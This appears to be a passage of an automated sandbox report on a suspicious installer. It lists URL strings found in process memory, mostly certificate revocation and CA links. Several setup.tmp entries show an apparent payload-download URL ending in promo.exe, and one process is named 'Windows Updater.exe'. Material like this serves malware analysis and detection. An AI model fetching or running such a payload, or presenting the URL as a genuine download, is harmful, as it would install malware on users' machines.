                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555386282.0000000003740000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exe
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exe1
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exeD
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exeData
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exeS7.tmp
                                  Source: setup.tmp, 00000004.00000002.4555386282.0000000003740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exea62
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exet
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ambadevgroup.info/load/1509/promo.exe~
                                  Source: setup.tmp, 00000004.00000002.4559403605.0000000010038000.00000002.00000001.01000000.00000009.sdmp, setup.tmp, 00000004.00000002.4557123919.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4543921017.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org/mitrich_k/inno-download-plugin
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: a1.exe, 00000014.00000002.2489356662.0000000004320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertD
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                                  Source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
                                  Source: a1.exe, 00000014.00000002.2488308459.000000000118F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG
                                  Source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: a1.exe, 00000014.00000002.2489356662.0000000004320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.c
                                  Source: a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490509551.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490509551.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                                  Source: a1.exe, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: http://collect.installeranalytics.com
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                                  Source: a1.exe, 00000014.00000003.2316689175.0000000004341000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004342000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                  Source: a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                  Source: a1.exe, 00000014.00000003.2316868836.0000000004324000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317160939.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.000000000433F000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316642450.000000000433C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
                                  Source: a1.exe, a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.d
                                  Source: a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.dDigi
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                  Source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
                                  Source: a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: a1.exe, 00000014.00000002.2489356662.0000000004320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096S
                                  Source: a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490509551.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: a1.exe, 00000014.00000002.2489356662.0000000004320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.c
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2453151386.0000000006ED0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316303508.00000000043CF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490509551.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2536551108.0000000001C00000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534296256.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2534256836.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
